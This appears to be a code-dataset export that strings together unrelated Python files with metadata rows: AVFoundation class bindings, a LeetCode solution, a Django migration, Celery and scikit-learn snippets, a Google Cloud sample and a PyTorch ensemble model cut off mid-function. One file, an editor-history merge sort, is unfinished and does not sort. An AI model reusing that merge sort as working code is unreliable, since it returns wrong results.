AVExternalPlaybackMonitorInternal = _Class('AVExternalPlaybackMonitorInternal')
AVTimeFormatterInternal = _Class('AVTimeFormatterInternal')
AVOutputDeviceAuthorizationRequest = _Class('AVOutputDeviceAuthorizationRequest')
AVOutputDeviceAuthorizationRequestInternal = _Class('AVOutputDeviceAuthorizationRequestInternal')
AVOutputDeviceAuthorizationSession = _Class('AVOutputDeviceAuthorizationSession')
AVOutputDeviceAuthorizationSessionInternal = _Class('AVOutputDeviceAuthorizationSessionInternal')
AVVideoCompositionRenderHint = _Class('AVVideoCompositionRenderHint')
AVVideoCompositionRenderHintInternal = _Class('AVVideoCompositionRenderHintInternal')
AVPlayerItemOutput = _Class('AVPlayerItemOutput')
AVPlayerItemLegibleOutput = _Class('AVPlayerItemLegibleOutput')
AVPlayerItemVideoOutput = _Class('AVPlayerItemVideoOutput')
AVPlayerItemMetadataOutput = _Class('AVPlayerItemMetadataOutput')
AVPlayerItemMetadataOutputInternal = _Class('AVPlayerItemMetadataOutputInternal')
AVOutputDeviceGroupMembershipChangeResult = _Class('AVOutputDeviceGroupMembershipChangeResult')
AVOutputDeviceGroup = _Class('AVOutputDeviceGroup')
AVExternalProtectionMonitor = _Class('AVExternalProtectionMonitor')
AVExternalProtectionMonitorInternal = _Class('AVExternalProtectionMonitorInternal')
AVFragmentedAssetTrackInternal = _Class('AVFragmentedAssetTrackInternal')
AVFragmentedAssetMinder = _Class('AVFragmentedAssetMinder')
AVFragmentedMovieMinder = _Class('AVFragmentedMovieMinder')
AVFragmentedAssetMinderInternal = _Class('AVFragmentedAssetMinderInternal')
AVFragmentedAssetInternal = _Class('AVFragmentedAssetInternal')
AVSampleBufferAudioRenderer = _Class('AVSampleBufferAudioRenderer')
AVSampleBufferAudioRendererInternal = _Class('AVSampleBufferAudioRendererInternal')
AVAssetWriterInputMetadataAdaptor = _Class('AVAssetWriterInputMetadataAdaptor')
AVAssetWriterInputMetadataAdaptorInternal = _Class('AVAssetWriterInputMetadataAdaptorInternal')
AVSynchronizedLayerInternal = _Class('AVSynchronizedLayerInternal')
AVAudioMixSweepFilterEffectParametersInternal = _Class('AVAudioMixSweepFilterEffectParametersInternal')
AVAudioMixEffectParameters = _Class('AVAudioMixEffectParameters')
AVAudioMixSweepFilterEffectParameters = _Class('AVAudioMixSweepFilterEffectParameters')
AVAssetExportSession = _Class('AVAssetExportSession')
AVAssetExportSessionInternal = _Class('AVAssetExportSessionInternal')
AVAssetProxyInternal = _Class('AVAssetProxyInternal')
AVVideoCompositionCoreAnimationToolInternal = _Class('AVVideoCompositionCoreAnimationToolInternal')
AVVideoCompositionCoreAnimationTool = _Class('AVVideoCompositionCoreAnimationTool')
AVVideoComposition = _Class('AVVideoComposition')
AVMutableVideoComposition = _Class('AVMutableVideoComposition')
AVVideoCompositionInternal = _Class('AVVideoCompositionInternal')
AVVideoCompositionLayerInstruction = _Class('AVVideoCompositionLayerInstruction')
AVMutableVideoCompositionLayerInstruction = _Class('AVMutableVideoCompositionLayerInstruction')
AVVideoCompositionLayerInstructionInternal = _Class('AVVideoCompositionLayerInstructionInternal')
AVVideoCompositionInstruction = _Class('AVVideoCompositionInstruction')
AVMutableVideoCompositionInstruction = _Class('AVMutableVideoCompositionInstruction')
AVVideoCompositionInstructionInternal = _Class('AVVideoCompositionInstructionInternal')
AVAssetWriterInputPassDescription = _Class('AVAssetWriterInputPassDescription')
AVAssetWriterInputPassDescriptionInternal = _Class('AVAssetWriterInputPassDescriptionInternal')
AVAssetWriterInputPassDescriptionResponder = _Class('AVAssetWriterInputPassDescriptionResponder')
AVAssetWriterInputMediaDataRequester = _Class('AVAssetWriterInputMediaDataRequester')
AVFigAssetWriterTrack = _Class('AVFigAssetWriterTrack')
AVFigAssetWriterGenericTrack = _Class('AVFigAssetWriterGenericTrack')
AVFigAssetWriterVideoTrack = _Class('AVFigAssetWriterVideoTrack')
AVFigAssetWriterAudioTrack = _Class('AVFigAssetWriterAudioTrack')
AVAssetWriterInputPixelBufferAdaptor = _Class('AVAssetWriterInputPixelBufferAdaptor')
AVAssetWriterInputPixelBufferAdaptorInternal = _Class('AVAssetWriterInputPixelBufferAdaptorInternal')
AVAssetWriterInputHelper = _Class('AVAssetWriterInputHelper')
AVAssetWriterInputTerminalHelper = _Class('AVAssetWriterInputTerminalHelper')
AVAssetWriterInputNoMorePassesHelper = _Class('AVAssetWriterInputNoMorePassesHelper')
AVAssetWriterInputInterPassAnalysisHelper = _Class('AVAssetWriterInputInterPassAnalysisHelper')
AVAssetWriterInputWritingHelper = _Class('AVAssetWriterInputWritingHelper')
AVAssetWriterInputUnknownHelper = _Class('AVAssetWriterInputUnknownHelper')
AVAssetWriterInput = _Class('AVAssetWriterInput')
AVAssetWriterInputInternal = _Class('AVAssetWriterInputInternal')
AVAssetWriterInputConfigurationState = _Class('AVAssetWriterInputConfigurationState')
AVRoutingSessionDestination = _Class('AVRoutingSessionDestination')
AVRoutingSessionDestinationInternal = _Class('AVRoutingSessionDestinationInternal')
AVRoutingSession = _Class('AVRoutingSession')
AVRoutingSessionInternal = _Class('AVRoutingSessionInternal')
AVRoutingSessionManager = _Class('AVRoutingSessionManager')
AVRoutingSessionManagerInternal = _Class('AVRoutingSessionManagerInternal')
AVPlayerItemMediaDataCollector = _Class('AVPlayerItemMediaDataCollector')
AVPlayerItemMetadataCollector = _Class('AVPlayerItemMetadataCollector')
AVPlayerItemMetadataCollectorInternal = _Class('AVPlayerItemMetadataCollectorInternal')
AVTimebaseObserver = _Class('AVTimebaseObserver')
AVOnceTimebaseObserver = _Class('AVOnceTimebaseObserver')
AVOccasionalTimebaseObserver = _Class('AVOccasionalTimebaseObserver')
AVPeriodicTimebaseObserver = _Class('AVPeriodicTimebaseObserver')
AVMediaSelectionOption = _Class('AVMediaSelectionOption')
AVMediaSelectionNilOption = _Class('AVMediaSelectionNilOption')
AVMediaSelectionKeyValueOption = _Class('AVMediaSelectionKeyValueOption')
AVMediaSelectionTrackOption = _Class('AVMediaSelectionTrackOption')
AVAssetWriterInputSelectionOption = _Class('AVAssetWriterInputSelectionOption')
AVMediaSelectionGroup = _Class('AVMediaSelectionGroup')
AVAssetMediaSelectionGroup = _Class('AVAssetMediaSelectionGroup')
AVAssetWriterInputGroup = _Class('AVAssetWriterInputGroup')
AVAssetWriterInputGroupInternal = _Class('AVAssetWriterInputGroupInternal')
AVFragmentedMediaDataReport = _Class('AVFragmentedMediaDataReport')
AVFragmentedMediaDataReportInternal = _Class('AVFragmentedMediaDataReportInternal')
AVAssetWriterFigAssetWriterNotificationHandler = _Class('AVAssetWriterFigAssetWriterNotificationHandler')
AVAssetWriterHelper = _Class('AVAssetWriterHelper')
AVAssetWriterTerminalHelper = _Class('AVAssetWriterTerminalHelper')
AVAssetWriterClientInitiatedTerminalHelper = _Class('AVAssetWriterClientInitiatedTerminalHelper')
AVAssetWriterFailedTerminalHelper = _Class('AVAssetWriterFailedTerminalHelper')
AVAssetWriterFinishWritingHelper = _Class('AVAssetWriterFinishWritingHelper')
AVAssetWriterWritingHelper = _Class('AVAssetWriterWritingHelper')
AVAssetWriterUnknownHelper = _Class('AVAssetWriterUnknownHelper')
AVAssetWriter = _Class('AVAssetWriter')
AVAssetWriterInternal = _Class('AVAssetWriterInternal')
AVAssetWriterConfigurationState = _Class('AVAssetWriterConfigurationState')
AVAssetReaderSampleReferenceOutputInternal = _Class('AVAssetReaderSampleReferenceOutputInternal')
AVAssetReaderVideoCompositionOutputInternal = _Class('AVAssetReaderVideoCompositionOutputInternal')
AVAssetReaderAudioMixOutputInternal = _Class('AVAssetReaderAudioMixOutputInternal')
AVAssetReaderTrackOutputInternal = _Class('AVAssetReaderTrackOutputInternal')
AVAssetReaderOutput = _Class('AVAssetReaderOutput')
AVAssetReaderSampleReferenceOutput = _Class('AVAssetReaderSampleReferenceOutput')
AVAssetReaderVideoCompositionOutput = _Class('AVAssetReaderVideoCompositionOutput')
AVAssetReaderAudioMixOutput = _Class('AVAssetReaderAudioMixOutput')
AVAssetReaderTrackOutput = _Class('AVAssetReaderTrackOutput')
AVAssetReaderOutputInternal = _Class('AVAssetReaderOutputInternal')
AVAssetReader = _Class('AVAssetReader')
AVAssetReaderInternal = _Class('AVAssetReaderInternal')
AVAssetTrackSegment = _Class('AVAssetTrackSegment')
AVCompositionTrackSegment = _Class('AVCompositionTrackSegment')
AVCompositionTrackSegmentInternal = _Class('AVCompositionTrackSegmentInternal')
AVMutableCompositionTrackInternal = _Class('AVMutableCompositionTrackInternal')
AVCompositionTrackInternal = _Class('AVCompositionTrackInternal')
AVCompositionTrackFormatDescriptionReplacement = _Class('AVCompositionTrackFormatDescriptionReplacement')
AVFigObjectInspector = _Class('AVFigObjectInspector')
AVAssetTrackInspector = _Class('AVAssetTrackInspector')
AVStreamDataAssetTrackInspector = _Class('AVStreamDataAssetTrackInspector')
AVPlaybackItemTrackInspector = _Class('AVPlaybackItemTrackInspector')
AVFigAssetTrackInspector = _Class('AVFigAssetTrackInspector')
AVTrackReaderInspector = _Class('AVTrackReaderInspector')
AVCompositionTrackReaderInspector = _Class('AVCompositionTrackReaderInspector')
AVAssetInspector = _Class('AVAssetInspector')
AVStreamDataAssetInspector = _Class('AVStreamDataAssetInspector')
AVFigAssetInspector = _Class('AVFigAssetInspector')
AVStreamingResourceInspector = _Class('AVStreamingResourceInspector')
AVPlaybackItemInspector = _Class('AVPlaybackItemInspector')
AVFormatReaderInspector = _Class('AVFormatReaderInspector')
AVCompositionFormatReaderInspector = _Class('AVCompositionFormatReaderInspector')
AVMutableCompositionInternal = _Class('AVMutableCompositionInternal')
AVCompositionInternal = _Class('AVCompositionInternal')
AVOutputDeviceDiscoverySessionAvailableOutputDevices = _Class('AVOutputDeviceDiscoverySessionAvailableOutputDevices')
AVEmptyOutputDeviceDiscoverySessionAvailableOutputDevices = _Class('AVEmptyOutputDeviceDiscoverySessionAvailableOutputDevices')
AVOutputDeviceDiscoverySession = _Class('AVOutputDeviceDiscoverySession')
AVOutputDeviceDiscoverySessionAvailableOutputDevicesInternal = _Class('AVOutputDeviceDiscoverySessionAvailableOutputDevicesInternal')
AVOutputDeviceDiscoverySessionInternal = _Class('AVOutputDeviceDiscoverySessionInternal')
AVQueuePlayerInternal = _Class('AVQueuePlayerInternal')
AVAssetDownloadStorageManagementPolicyInternal = _Class('AVAssetDownloadStorageManagementPolicyInternal')
AVAssetDownloadStorageManagementPolicy = _Class('AVAssetDownloadStorageManagementPolicy')
AVMutableAssetDownloadStorageManagementPolicy = _Class('AVMutableAssetDownloadStorageManagementPolicy')
AVAssetDownloadStorageManager = _Class('AVAssetDownloadStorageManager')
AVPlayerItemTrack = _Class('AVPlayerItemTrack')
AVPlayerItemTrackInternal = _Class('AVPlayerItemTrackInternal')
AVPlayerLoggingIdentifier = _Class('AVPlayerLoggingIdentifier')
AVPlayerLoggingIdentifierInternal = _Class('AVPlayerLoggingIdentifierInternal')
AVAssetLoggingIdentifier = _Class('AVAssetLoggingIdentifier')
AVAssetLoggingIdentifierInternal = _Class('AVAssetLoggingIdentifierInternal')
AVSpecifiedLoggingIdentifier = _Class('AVSpecifiedLoggingIdentifier')
AVSpecifiedLoggingIdentifierInternal = _Class('AVSpecifiedLoggingIdentifierInternal')
AVPlayerConnection = _Class('AVPlayerConnection')
AVPlayerItem = _Class('AVPlayerItem')
AVPlayerItemInternal = _Class('AVPlayerItemInternal')
AVOutputContextLocalOutputDeviceGroupImpl = _Class('AVOutputContextLocalOutputDeviceGroupImpl')
AVPlayerQueueModificationDescription = _Class('AVPlayerQueueModificationDescription')
AVPlayer = _Class('AVPlayer')
AVQueuePlayer = _Class('AVQueuePlayer')
AVPlayerInternal = _Class('AVPlayerInternal')
AVAssetTrack = _Class('AVAssetTrack')
AVMovieTrack = _Class('AVMovieTrack')
AVMutableMovieTrack = _Class('AVMutableMovieTrack')
AVFragmentedMovieTrack = _Class('AVFragmentedMovieTrack')
AVFragmentedAssetTrack = _Class('AVFragmentedAssetTrack')
AVCompositionTrack = _Class('AVCompositionTrack')
AVMutableCompositionTrack = _Class('AVMutableCompositionTrack')
AVAssetTrackInternal = _Class('AVAssetTrackInternal')
AVAssetReaderOutputMetadataAdaptor = _Class('AVAssetReaderOutputMetadataAdaptor')
AVAssetReaderOutputMetadataAdaptorInternal = _Class('AVAssetReaderOutputMetadataAdaptorInternal')
AVAssetImageGenerator = _Class('AVAssetImageGenerator')
AVAssetImageGeneratorInternal = _Class('AVAssetImageGeneratorInternal')
AVURLAssetItemProviderData = _Class('AVURLAssetItemProviderData')
AVAssetClientURLRequestHelper = _Class('AVAssetClientURLRequestHelper')
AVURLAssetInternal = _Class('AVURLAssetInternal')
AVAssetFragment = _Class('AVAssetFragment')
AVAssetFragmentInternal = _Class('AVAssetFragmentInternal')
AVAsset = _Class('AVAsset')
AVStreamDataAsset = _Class('AVStreamDataAsset')
AVMovie = _Class('AVMovie')
AVMutableMovie = _Class('AVMutableMovie')
AVFragmentedMovie = _Class('AVFragmentedMovie')
AVAssetProxy = _Class('AVAssetProxy')
AVComposition = _Class('AVComposition')
AVMutableComposition = _Class('AVMutableComposition')
AVDataAsset = _Class('AVDataAsset')
AVURLAsset = _Class('AVURLAsset')
AVStreamDataInspectionOnlyAsset = _Class('AVStreamDataInspectionOnlyAsset')
AVFragmentedAsset = _Class('AVFragmentedAsset')
AVAssetInternal = _Class('AVAssetInternal')
AVMetadataItemFilterInternal = _Class('AVMetadataItemFilterInternal')
AVMetadataItemFilter = _Class('AVMetadataItemFilter')
AVMetadataItemFilterForSharing = _Class('AVMetadataItemFilterForSharing')
AVChapterMetadataItemInternal = _Class('AVChapterMetadataItemInternal')
AVMetadataItemValueRequest = _Class('AVMetadataItemValueRequest')
AVMetadataItemValueRequestInternal = _Class('AVMetadataItemValueRequestInternal')
AVLazyValueLoadingMetadataItemInternal = _Class('AVLazyValueLoadingMetadataItemInternal')
AVMetadataItem = _Class('AVMetadataItem')
AVChapterMetadataItem = _Class('AVChapterMetadataItem')
AVLazyValueLoadingMetadataItem = _Class('AVLazyValueLoadingMetadataItem')
AVMutableMetadataItem = _Class('AVMutableMetadataItem')
AVMetadataItemInternal = _Class('AVMetadataItemInternal')
AVPlayerLooper = _Class('AVPlayerLooper')
AVPlayerLooperInternal = _Class('AVPlayerLooperInternal')
AVPlayerLayerInternal = _Class('AVPlayerLayerInternal')
AVFigRemoteRouteDiscovererFactory = _Class('AVFigRemoteRouteDiscovererFactory')
AVRunLoopCondition = _Class('AVRunLoopCondition')
AVURLAuthenticationChallenge = _Class('AVURLAuthenticationChallenge')
AVAggregateAssetDownloadTask = _Class('AVAggregateAssetDownloadTask')
AVOperationQueueWithFundamentalDependency = _Class('AVOperationQueueWithFundamentalDependency')
AVNetworkPlaybackPerfHUDLayer = _Class('AVNetworkPlaybackPerfHUDLayer')
AVSampleBufferDisplayLayer = _Class('AVSampleBufferDisplayLayer')
AVSampleBufferDisplayLayerContentLayer = _Class('AVSampleBufferDisplayLayerContentLayer')
AVSynchronizedLayer = _Class('AVSynchronizedLayer')
AVPlayerLayer = _Class('AVPlayerLayer')
AVPlayerLayerIntermediateLayer = _Class('AVPlayerLayerIntermediateLayer')
AVWaitForNotificationOrDeallocationOperation = _Class('AVWaitForNotificationOrDeallocationOperation')
AVOperation = _Class('AVOperation')
AVRouteConfigUpdatedFigRoutingContextRouteChangeOperation = _Class('AVRouteConfigUpdatedFigRoutingContextRouteChangeOperation')
AVFigRoutingContextRouteChangeOperation = _Class('AVFigRoutingContextRouteChangeOperation')
AVFigRoutingContextSendConfigureDeviceCommandOperation = _Class('AVFigRoutingContextSendConfigureDeviceCommandOperation')
AVBlockOperation = _Class('AVBlockOperation')
AVAssetWriterInputFigAssetWriterEndPassOperation = _Class('AVAssetWriterInputFigAssetWriterEndPassOperation')
AVFigAssetWriterFinishWritingAsyncOperation = _Class('AVFigAssetWriterFinishWritingAsyncOperation')
AVWorkaroundNSBlockOperation = _Class('AVWorkaroundNSBlockOperation')
AVMetadataEnumerator = _Class('AVMetadataEnumerator')
AVAssetTrackEnumerator = _Class('AVAssetTrackEnumerator')
AVTimeFormatter = _Class('AVTimeFormatter')
CMTimeMappingAsValue = _Class('CMTimeMappingAsValue')
CMTimeRangeAsValue = _Class('CMTimeRangeAsValue')
CMTimeAsValue = _Class('CMTimeAsValue')
AVFragmentedAssetsArray = _Class('AVFragmentedAssetsArray')
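if __name__ == "__main__":
    # Usage sketch (not part of the generated bindings): each module-level name above
    # is either an ObjCClass handle (when rubicon-objc and the framework are available
    # on this system) or None, so callers can feature-check before touching a class.
    print("AVPlayer available:", AVPlayer is not None)
    print("AVAsset available:", AVAsset is not None)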
| [
"[email protected]"
] | |
34fbcbb5b07243310281ddcea4e59205032d636b | 153da69b35f032f5b83a06f17008ba41a1b336b4 | /src/demo/__init__.py | da984a42f90721752b48b31d39530ff3bf6f8ff9 | [
"MIT"
] | permissive | TrendingTechnology/hspylib | 6400cadf9dfe6ab5733712dcfeccf8022d61c589 | c79a2c17e89fe21d00ccd9c1646a03407cd61839 | refs/heads/master | 2023-06-20T15:47:35.962661 | 2021-07-19T22:12:18 | 2021-07-19T23:45:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 148 | py | # _*_ coding: utf-8 _*_
#
# HSPyLib v0.11.1
#
# Package: demo
"""Package initialization."""
__all__ = [
'calculator',
'cli',
'phonebook'
]
| [
"[email protected]"
] | |
30b2b633485473169ebe3f7392c7b57e23c0e4d2 | da7a165522daea7c346693c5f32850017c482967 | /leetcode/60questions/347_top_k_frequent_elements.py | b13499eff1c603b9085c6ed2ac07a357fad804ac | [] | no_license | SShayashi/ABC | 19f8750919208c5ff8935638dbaab941c255f914 | 3cbfee0c5251c1bb0df6306166d8d4b33bf7bb2c | refs/heads/master | 2021-05-04T21:06:10.720367 | 2020-07-11T13:59:16 | 2020-07-11T13:59:29 | 119,886,572 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 939 | py | from typing import List
class Solution:
def topKFrequent(self, nums: List[int], k: int) -> List[int]:
d = {}
for num in nums:
            d[num] = d.get(num, 0) + 1
tmp = list(d.items())
tmp.sort(key=lambda x: x[1], reverse=True)
ans = []
for i in range(k):
ans.append(tmp[i][0])
return ans
def maxheaplify(nums: List[int], i):
    # Sift nums[i] down: swap it with its larger child and continue in that child's
    # subtree until the max-heap property holds.
    left = i * 2 + 1
    right = i * 2 + 2
    largest = i
    if left < len(nums) and nums[left] > nums[largest]:
        largest = left
    if right < len(nums) and nums[right] > nums[largest]:
        largest = right
    if largest != i:
        nums[i], nums[largest] = nums[largest], nums[i]
        maxheaplify(nums, largest)
def heaplify(nums: List[int]):
length = len(nums)
for i in reversed(range(length // 2)):
maxheaplify(nums, i)
return nums
y = [3, 5, 6, 8, 2, 3, 4, 5, 21, 1, 4, 5, 7, 9, 2, 22]
print(heaplify(y))
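if __name__ == "__main__":
    # sample check of the hash-map counting solution (input values are arbitrary)
    print(Solution().topKFrequent([1, 1, 1, 2, 2, 3], 2))  # expected: [1, 2]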
| [
"[email protected]"
] | |
ff99da7f9a431c6ffe09cca96a217b4f38518c7a | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/merge_20200722101228.py | fc5063ed0117fd9fbf7a41674a7bab7060ccc3e0 | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 477 | py | items = []
def mergeSort(data):
if len(data) > 1:
mid = len(data) // 2
leftArr = data[:mid]
rightArr= data[mid:]
# now to perform the merge
i = 0
j = 0
k = 0
while i < len(leftArr) and j < len(rightArr):
if leftArr[i] < rightArr[j]:
data[k] =leftArr[i]
i +=1
else:
data[k] = rightArr[j]
j +=1
| [
"[email protected]"
] | |
bde3cdffacb74c379934c3b976da5ac53db144a3 | 51e93332b5b0221bb1b34d4b53f761d9d53e1b9c | /app/core/migrations/0001_initial.py | a88ea9f86995282d556a7ffaa56cd09c1bfd0e23 | [
"MIT"
] | permissive | MaistrenkoAnton/TDD | 286d0cb0d24c796f045eeac4d03f29ac3bf0ab5a | 20049d08f22aeeb626a7975bbee3dc5c95c76449 | refs/heads/master | 2020-06-02T03:32:20.396472 | 2019-08-05T12:24:57 | 2019-08-05T12:24:57 | 191,021,446 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,707 | py | # Generated by Django 2.1.9 on 2019-06-09 19:47
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0009_alter_user_last_name_max_length'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('email', models.EmailField(max_length=255, unique=True)),
('name', models.CharField(max_length=255)),
('is_active', models.BooleanField(default=True)),
('is_staff', models.BooleanField(default=True)),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'abstract': False,
},
),
]
| [
"[email protected]"
] | |
710826787f7469b5c8d8e68f530a894b8067623e | f24f8a5cf1580470cf616705a220027feac9b177 | /awesome/api/awesome/celery.py | ecb47c15ebd34979cbb44196e89352deda7f603a | [] | no_license | tvtrong/restapi | 4f5eb4ad545ed9dd7847f63994957fdc76fc3eba | c3da498108df1e7950ea2cc003dd75f0fe5a1b60 | refs/heads/master | 2022-12-25T19:39:45.627411 | 2020-10-10T12:39:33 | 2020-10-10T12:39:33 | 302,898,797 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 245 | py | import os
from celery import Celery
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "awesome.settings")
celery_app = Celery("awesome")
celery_app.config_from_object("django.conf:settings", namespace="CELERY")
celery_app.autodiscover_tasks()
| [
"[email protected]"
] | |
746774617ed9e37b03bbc24665b63b4a592bf514 | baf3996414315ffb60470c40c7ad797bf4e6897f | /02_ai/1_ml/4_ml_mastery/code/chapter_09/shuffle_split.py | 300dc2268fc15665661c5450849e0a375e9836d3 | [
"MIT"
] | permissive | thiago-allue/portfolio | 8fbbecca7ce232567aebe97c19944f444508b7f4 | 0acd8253dc7c5150fef9b2d46eead3db83ca42de | refs/heads/main | 2023-03-15T22:10:21.109707 | 2022-09-14T17:04:35 | 2022-09-14T17:04:35 | 207,919,073 | 0 | 0 | null | 2019-11-13T18:18:23 | 2019-09-11T22:40:46 | Python | UTF-8 | Python | false | false | 733 | py | # Evaluate using Shuffle Split Cross Validation
from pandas import read_csv
from sklearn.model_selection import ShuffleSplit
from sklearn.model_selection import cross_val_score
from sklearn.linear_model import LogisticRegression
filename = 'pima-indians-diabetes.data.csv'
names = ['preg', 'plas', 'pres', 'skin', 'test', 'mass', 'pedi', 'age', 'class']
dataframe = read_csv(filename, names=names)
array = dataframe.values
X = array[:,0:8]
Y = array[:,8]
n_splits = 10
test_size = 0.33
seed = 7
kfold = ShuffleSplit(n_splits=n_splits, test_size=test_size, random_state=seed)
model = LogisticRegression()
results = cross_val_score(model, X, Y, cv=kfold)
print("Accuracy: %.3f%% (%.3f%%)" % (results.mean()*100.0, results.std()*100.0)) | [
"[email protected]"
] | |
c62c24e115cdf1835d84b2b7bb4b7def2fbadcf6 | 5da5473ff3026165a47f98744bac82903cf008e0 | /packages/google-cloud-dms/samples/generated_samples/datamigration_v1_generated_data_migration_service_stop_migration_job_async.py | a4bc8f0f5878cfe73e659344426766b46ce49d17 | [
"Apache-2.0"
] | permissive | googleapis/google-cloud-python | ed61a5f03a476ab6053870f4da7bc5534e25558b | 93c4e63408c65129422f65217325f4e7d41f7edf | refs/heads/main | 2023-09-04T09:09:07.852632 | 2023-08-31T22:49:26 | 2023-08-31T22:49:26 | 16,316,451 | 2,792 | 917 | Apache-2.0 | 2023-09-14T21:45:18 | 2014-01-28T15:51:47 | Python | UTF-8 | Python | false | false | 1,959 | py | # -*- coding: utf-8 -*-
# Copyright 2023 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for StopMigrationJob
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-dms
# [START datamigration_v1_generated_DataMigrationService_StopMigrationJob_async]
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import clouddms_v1
async def sample_stop_migration_job():
# Create a client
client = clouddms_v1.DataMigrationServiceAsyncClient()
# Initialize request argument(s)
request = clouddms_v1.StopMigrationJobRequest(
)
# Make the request
operation = client.stop_migration_job(request=request)
print("Waiting for operation to complete...")
response = (await operation).result()
# Handle the response
print(response)
# [END datamigration_v1_generated_DataMigrationService_StopMigrationJob_async]
| [
"[email protected]"
] | |
fab55d204978d837e4212c08440b33872d36947d | 2405752a692d003f83fa2f24272d7afa47254fc6 | /dynamics/probabilistic_ensemble.py | 21cd4706ea25f86a424352dc12e3a9c085389b78 | [
"MIT"
] | permissive | ZhihanLee/sac-plus | 1edee7724939484cf72181e0789c3e03a2542451 | 829c8652bc07a420e855ace696ae44de5feb5379 | refs/heads/main | 2023-03-09T01:27:30.775603 | 2021-02-21T22:46:47 | 2021-02-21T22:46:47 | 476,717,412 | 2 | 0 | MIT | 2022-04-01T12:46:44 | 2022-04-01T12:46:43 | null | UTF-8 | Python | false | false | 8,717 | py | import os
import torch as th
from torch import nn as nn
from torch.nn import functional as F
import numpy as np
import pickle
#TODO:
# - Better to predict logvar or logstd?
# - Learn logvar or keep it constant?
# - Holdout loss: best ratio? save best checkpoint in epoch? individual improvement?
class EnsembleLayer(nn.Module):
def __init__(self, ensemble_size, input_dim, output_dim):
super().__init__()
self.W = nn.Parameter(th.empty((ensemble_size, input_dim, output_dim)), requires_grad=True).float()
nn.init.xavier_uniform_(self.W, gain=nn.init.calculate_gain('relu'))
self.b = nn.Parameter(th.zeros((ensemble_size, 1, output_dim)), requires_grad=True).float()
def forward(self, x):
# assumes x is 3D: (ensemble_size, batch_size, dimension)
return x @ self.W + self.b
class ProbabilisticEnsemble(nn.Module):
def __init__(self, input_dim, output_dim, ensemble_size=5, arch=(200,200,200,200), activation=F.relu, learning_rate=0.001, num_elites=2, device='auto'):
super().__init__()
self.ensemble_size = ensemble_size
self.input_dim = input_dim
self.output_dim = output_dim * 2 # mean and std
self.activation = activation
self.arch = arch
self.num_elites = num_elites
self.elites = [i for i in range(self.ensemble_size)]
self.layers = nn.ModuleList()
in_size = input_dim
for hidden_size in self.arch:
self.layers.append(EnsembleLayer(ensemble_size, in_size, hidden_size))
in_size = hidden_size
self.layers.append(EnsembleLayer(ensemble_size, self.arch[-1], self.output_dim))
self.inputs_mu = nn.Parameter(th.zeros(input_dim), requires_grad=False).float()
self.inputs_sigma = nn.Parameter(th.zeros(input_dim), requires_grad=False).float()
self.max_logvar = nn.Parameter(th.ones(1, output_dim, dtype=th.float32) / 2.0).float()
self.min_logvar = nn.Parameter(-th.ones(1, output_dim, dtype=th.float32) * 10.0).float()
self.decays = [0.000025, 0.00005, 0.000075, 0.000075, 0.0001]
self.optim = th.optim.Adam([{'params': self.layers[i].parameters(), 'weight_decay': self.decays[i]} for i in range(len(self.layers))] +
[{'params': self.max_logvar}, {'params': self.min_logvar}], lr=learning_rate)
if device == 'auto':
self.device = th.device('cuda') if th.cuda.is_available() else th.device('cpu')
else:
self.device = device
self.to(self.device)
def forward(self, input, deterministic=False, return_dist=False):
dim = len(input.shape)
# input normalization
h = (input - self.inputs_mu) / self.inputs_sigma
# repeat h to make amenable to parallelization
# if dim = 3, then we probably already did this somewhere else (e.g. bootstrapping in training optimization)
if dim < 3:
h = h.unsqueeze(0)
if dim == 1:
h = h.unsqueeze(0)
h = h.repeat(self.ensemble_size, 1, 1)
for layer in self.layers[:-1]:
h = layer(h)
h = self.activation(h)
output = self.layers[-1](h)
# if original dim was 1D, squeeze the extra created layer
if dim == 1:
output = output.squeeze(1) # output is (ensemble_size, output_size)
mean, logvar = th.chunk(output, 2, dim=-1)
# Variance clamping to prevent poor numerical predictions
logvar = self.max_logvar - F.softplus(self.max_logvar - logvar)
logvar = self.min_logvar + F.softplus(logvar - self.min_logvar)
if deterministic:
if return_dist:
return mean, logvar
else:
return mean
else:
std = th.sqrt(th.exp(logvar))
samples = mean + std * th.randn(std.shape, device=std.device)
if return_dist:
return samples, mean, logvar
else:
return samples
def compute_loss(self, x, y):
mean, logvar = self.forward(x, deterministic=True, return_dist=True)
inv_var = th.exp(-logvar)
if len(y.shape) < 3:
